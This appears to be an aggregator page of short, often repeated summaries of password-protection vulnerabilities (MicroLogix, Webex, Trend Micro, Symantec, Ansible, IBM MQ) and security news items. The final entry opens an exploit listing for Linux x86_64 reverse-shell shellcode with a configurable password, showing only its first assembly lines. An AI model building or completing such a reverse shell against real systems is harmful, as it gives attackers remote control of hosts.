CVE-2020-6990

Rockwell Automation MicroLogix 1400 Controllers Series B v21.001 and prior, Series A, all versions, MicroLogix 1100 Controller, all versions, RSLogix 500 Software v12.001 and prior, The cryptographic key utilized to help protect the account password is hard coded into the RSLogix 500 binary file...

The vulnerability of the cryptographic function used to protect passwords, the RSLogix 500 software, and the programmable logic controllers MicroLogix 1100 and MicroLogix 1400, allows unauthorized access to confidential information.

The vulnerability of the cryptographic function used to protect passwords, the RSLogix 500 software, and the MicroLogix 1100 and MicroLogix 1400 programmable logic controllers is related to the use of cryptographic algorithms that contain vulnerabilities. Exploiting this vulnerability could allow...

Zoom Bug Could Have Let Uninvited People Join Private Meetings

If you use Zoom to host your remote online meetings, you need to read this piece carefully. The massively popular video conferencing software has patched a security loophole that could have allowed anyone to remotely eavesdrop on unprotected active meetings, potentially exposing private audio,...

CVE-2020-3142

A vulnerability in Cisco Webex Meetings Suite sites and Cisco Webex Meetings Online sites could allow an unauthenticated, remote attendee to join a password-protected meeting without providing the meeting password. The connection attempt must initiate from a Webex mobile application for either iO...

CVE-2019-3700

The CVE-2019-3700 entry relates to yast2-security not using secure defaults for passwords. Technical details across connected records show insecure defaults used prior to version 4.2.6, with password hashes potentially protected poorly due to DES encryption. The fix stated is that yast2-security ...

CVE-2019-19690

Trend Micro Mobile Security for Android Consumer versions 10.3.1 and below on Android 8.0+ has an issue in which an attacker could bypass the product's App Password Protection feature...

CVE-2019-19690

Trend Micro Mobile Security for Android Consumer versions 10.3.1 and below on Android 8.0+ has an issue in which an attacker could bypass the product's App Password Protection feature...

Design/Logic Flaw

Trend Micro Mobile Security for Android Consumer versions 10.3.1 and below on Android 8.0+ has an issue in which an attacker could bypass the product's App Password Protection feature...

CVE-2019-19690

CVE-2019-19690 affects Trend Micro Mobile Security for Android (Consumer) versions 10.3.1 and earlier on Android 8.0+. The vulnerability enables bypass of the product’s App Password Protection feature. Details on root cause, affected files/components, exploit steps, or concrete remediation are no...

Mail.ru: Mail.Ru Top - Website Counter Bruteforcing

counter-specific password at top.mail.ru was not sufficiently protected against bruteforce...

Code injection

ansible-playbook -k and ansible cli tools, all versions 2.8.x before 2.8.4, all 2.7.x before 2.7.13 and all 2.6.x before 2.6.19, prompt passwords by expanding them from templates as they could contain special characters. Passwords should be wrapped to prevent templates trigger and exposing them...

Security Bulletin: IBM MQ Java/JMS application can incorrectly flow password in plain text. (CVE-2017-1337)

Summary IBM MQ Java/JMS application can incorrectly flow password in plain text when PASSWORDPROTECTION=ALWAYS is set in mqclient.ini Vulnerability Details CVEID: CVE-2017-1337 DESCRIPTION: IBM MQ Java/JMS application can incorrectly transmit user credentials in plain text. CVSS Base Score: 5.9...

CVE-2019-12756

Symantec Endpoint Protection SEP, prior to 14.2 RU2 may be susceptible to a password protection bypass vulnerability whereby the secondary layer of password protection could by bypassed for individuals with local administrator rights...

CVE-2019-12756

Symantec Endpoint Protection SEP, prior to 14.2 RU2 may be susceptible to a password protection bypass vulnerability whereby the secondary layer of password protection could by bypassed for individuals with local administrator rights...

Design/Logic Flaw

Symantec Endpoint Protection SEP, prior to 14.2 RU2 may be susceptible to a password protection bypass vulnerability whereby the secondary layer of password protection could by bypassed for individuals with local administrator rights...

CVE-2019-12756

Symantec Endpoint Protection (SEP) clients prior to 14.2 RU2 are susceptible to a local password-protection bypass (CVE-2019-12756). An authenticated local attacker could bypass the second layer of password protection and perform actions with local privileges. Connected advisories also reference ...

CVE-2019-12756

Symantec Endpoint Protection SEP, prior to 14.2 RU2 may be susceptible to a password protection bypass vulnerability whereby the secondary layer of password protection could by bypassed for individuals with local administrator rights...

Mattress Company Leaks Data Records of 387K Customers

A Wisconsin mattress company leaked the records of 387,000 customers online in a database that lacked password protection, a security researcher has found. The incident once again demonstrates the potential security consequences of failing to take even the simplest security measures to protect...

Employers Beware: Microsoft Word 'Resume' Phish Delivers Malware

Employers who receive an email from someone purporting to be a job applicant, with an attached resume, could fall victim to a difficult-to-detect phishing campaign peddling a remote-access tool used often for espionage. Researchers with Cofense said they have recently spotted emails with maliciou...

Linux/x86_64 - Reverse Shell (/bin/sh) with Configurable Password Shellcode (120 bytes)

/ ; Title : Linux/x8664 - Reverse Shell /bin/sh with Password configurable 120 bytes ; Date : 2019-08-18 ; Author : Gonçalo Ribeiro @goncalor ; Website : goncalor.com ; SLAE64-ID : 1635 global start %define pass "pass" %define port 0x5c11 ; htons4444 start: jmp realstart password: db pass passlen...